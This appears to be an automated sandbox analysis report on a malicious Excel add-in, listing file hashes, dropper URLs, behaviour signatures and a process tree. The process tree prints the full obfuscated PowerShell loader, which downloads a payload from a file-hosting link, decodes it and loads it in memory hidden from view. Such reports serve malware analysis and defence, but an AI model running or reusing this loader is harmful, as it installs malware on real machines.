Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    22-10-2024 01:27

General

  • Target

    70cbb6ca45c4d23bfd817fc0a822b7907f281ae01602fcedbf5cc7e634f8422a.xlam

  • Size

    611KB

  • MD5

    33befe584a0a8e659e29c8ce5129f61f

  • SHA1

    32236fd8f2c9d1b62e4633c72bbe5c38107d56c8

  • SHA256

    70cbb6ca45c4d23bfd817fc0a822b7907f281ae01602fcedbf5cc7e634f8422a

  • SHA512

    61d19eddddeee6fe0c63a3671be572ab76fa29b137fac326981f420575c3235034320fc50f2f25c77254f2190b5d8d1373137e54235e7700c4d2428f3b8c604d

  • SSDEEP

    12288:P8BiIRAbnhLSkFsU9qjGLD00o36LAto7eDwUB1m0SN0C1TGcbDMasYGHI:0rMt4m1+o0+0Sn1TTQqGHI

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp

exe.dropper

https://drive.google.com/uc?export=download&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\70cbb6ca45c4d23bfd817fc0a822b7907f281ae01602fcedbf5cc7e634f8422a.xlam
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2704
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2952
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\negroooogreeeeceemanager.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2620
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd6VjRpbWFnZVVybCA9IE9MQ2h0dHBzOi8vZHInKydpdmUuJysnZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MS0nKydXZGdlcTBmWDknKydhQXBkbFNXOWRsbjFQY19LRUdwZkhwIE9MQzt6VjR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3pWNGltYWdlQnl0ZXMgPSB6VjR3ZWJDbGllbnQuRG93bmxvYWREYXRhKHpWNGltYWdlVXJsKTt6VjRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFMnKyd0cmluZyh6VjRpbWFnZUJ5dCcrJ2VzKTt6VjRzdGFydEZsYWcgPSBPTEM8PEJBU0U2NF9TVEFSVCcrJz4+T0xDO3pWNGVuJysnZEZsYWcgPSBPTEM8PEJBU0U2NF9FTkQ+Pk9MQzt6VjRzdGFydEluZGV4ID0gelY0aW1hZ2VUZXh0LkluZGV4T2YoelY0c3RhcnRGbGFnKTt6VjRlbmRJbmRleCA9IHpWNGltYWdlVGV4dC5JbmRleE9mKHpWNGVuZEYnKydsYWcpO3pWNHN0YXJ0SW5kZXggLWdlIDAgLWFuZCB6VjRlbmRJbmRleCAtZ3QgelY0c3RhcnRJbmRleDt6VjRzJysndGFydEluZGV4ICs9IHpWNHN0YXJ0RmxhZy5MZW5ndGg7elY0YmFzZTY0TGVuZ3RoICcrJz0gelY0ZW5kSW5kZXggLSB6VjRzdGFydEluZGV4O3pWNGJhc2U2NENvbW1hbmQgPSB6VjRpbWFnZVRleHQuU3Vic3RyaW5nKHpWNHN0YXJ0JysnSW5kZXgsIHpWNGJhc2U2NExlbmcnKyd0aCk7elY0YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoelY0YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGtSaSBGb3JFYWNoLU9iamVjdCB7IHpWNF8gfSlbLTEuLi0oelY0YicrJ2FzZTY0Q29tbWFuZC5MZW5ndGgpXTt6VjRjb21tYW5kQnl0ZXMgPSBbU3lzdGUnKydtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHpWNGJhc2U2NFJldmVyc2VkKTt6VjRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoelY0Y29tbScrJ2FuZEJ5dGVzKTt6VjR2YWlNZXRob2QgPSBbZG4nKydsaWIuSU8uSG9tZV0uR2V0TWV0aG9kKCcrJ09MQ1ZBSU9MQyk7elY0dmFpTWV0aG9kLkludm9rZSh6VjRudWxsLCBAKE9MQ3R4dC45Njg1Nzh0dHR0dHRzZXRhbGRpb3JkL2dyby5zbmRrY3VkLmUnKydlZWNlZXJnc2J2eXl5eWFkbicrJ29tLy86cHR0aE9MQywgT0xDZGVzYXRpdmFkb09MQywgT0xDZGVzYXRpdmFkb09MQywnKycgT0xDZGVzYXRpdmFkb09MQywgT0wnKydDQWRkSW5Qcm9jZXNzMzJPTEMsIE9MQ2Rlc2F0aXZhZCcrJ29PTEMsIE9MQ2Rlc2F0aXZhZG9PTEMsT0xDZGVzYXQnKydpdmFkb09MQyxPTENkZXNhdGl2YWRvT0xDLE9MQ2Rlc2F0aXZhZG9PTCcrJ0MsT0xDZGVzYXRpdmFkb09MJysnQyxPTENkZXNhdGl2YWRvT0xDLE9MQzFPTEMpKTsnKS5yRVBsYWNFKCd6VjQnLCckJykuckVQbGFjRSgoW0NoQVJdMTA3K1tDaEFSXTgyK1tDaEFSXTEwNSksJ3wnKS5yRVBsYWNFKCdPTEMnLFtTdHJpbkddW0NoQVJdMzkpfCAuICggJGVuVjpDb01TcGVjWzQsMjQsMjVdLWpvaW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2976
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('zV4imageUrl = OLChttps://dr'+'ive.'+'google.com/uc?export=download&id=1-'+'Wdgeq0fX9'+'aApdlSW9dln1Pc_KEGpfHp OLC;zV4webClient = New-Object System.Net.WebClient;zV4imageBytes = zV4webClient.DownloadData(zV4imageUrl);zV4imageText = [System.Text.Encoding]::UTF8.GetS'+'tring(zV4imageByt'+'es);zV4startFlag = OLC<<BASE64_START'+'>>OLC;zV4en'+'dFlag = OLC<<BASE64_END>>OLC;zV4startIndex = zV4imageText.IndexOf(zV4startFlag);zV4endIndex = zV4imageText.IndexOf(zV4endF'+'lag);zV4startIndex -ge 0 -and zV4endIndex -gt zV4startIndex;zV4s'+'tartIndex += zV4startFlag.Length;zV4base64Length '+'= zV4endIndex - zV4startIndex;zV4base64Command = zV4imageText.Substring(zV4start'+'Index, zV4base64Leng'+'th);zV4base64Reversed = -join (zV4base64Command.ToCharArray() kRi ForEach-Object { zV4_ })[-1..-(zV4b'+'ase64Command.Length)];zV4commandBytes = [Syste'+'m.Convert]::FromBase64String(zV4base64Reversed);zV4loadedAssembly = [System.Reflection.Assembly]::Load(zV4comm'+'andBytes);zV4vaiMethod = [dn'+'lib.IO.Home].GetMethod('+'OLCVAIOLC);zV4vaiMethod.Invoke(zV4null, @(OLCtxt.968578ttttttsetaldiord/gro.sndkcud.e'+'eeceergsbvyyyyadn'+'om//:ptthOLC, OLCdesativadoOLC, OLCdesativadoOLC,'+' OLCdesativadoOLC, OL'+'CAddInProcess32OLC, OLCdesativad'+'oOLC, OLCdesativadoOLC,OLCdesat'+'ivadoOLC,OLCdesativadoOLC,OLCdesativadoOL'+'C,OLCdesativadoOL'+'C,OLCdesativadoOLC,OLC1OLC));').rEPlacE('zV4','$').rEPlacE(([ChAR]107+[ChAR]82+[ChAR]105),'|').rEPlacE('OLC',[StrinG][ChAR]39)| . ( $enV:CoMSpec[4,24,25]-join'')"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2244

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    274707d22f3c38d24363de46d98134ae

    SHA1

    6d1e324f06acea11db975c69f0c5f7f83d95d7f4

    SHA256

    50fc11ca52416e34cb4569b5622e7c1b53e886b7336f235f4292f41c369b15b2

    SHA512

    5f24295cf0c6132869bb9ae35cabf0c443eb8ce91b95d102c31a47a2eed3cae0044ec9fea83d656fc21f8308aff7c14de36301553f0c729fc3e425a11dd32abb

  • C:\Users\Admin\AppData\Roaming\negroooogreeeeceemanager.vbs

    Filesize

    192KB

    MD5

    50b077ebb8d0ec5ccfa4c82bc511f5d6

    SHA1

    868495c7c7c6d2cc4f43e09975f7fa84cec7d30f

    SHA256

    92093331155feed076959cf7422498f3c23e312c65936aae1693e14be0a713da

    SHA512

    ca6804d459f3ecc1446467e1fc9969d457d5ead49d44a982a5860535f374a6a7cba7adcfe26feaf89d95002bd4dff4c35a0483c714d6db4a4b32aa01a7a7382b

  • memory/2704-1-0x00000000724CD000-0x00000000724D8000-memory.dmp

    Filesize

    44KB

  • memory/2704-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2704-16-0x00000000724CD000-0x00000000724D8000-memory.dmp

    Filesize

    44KB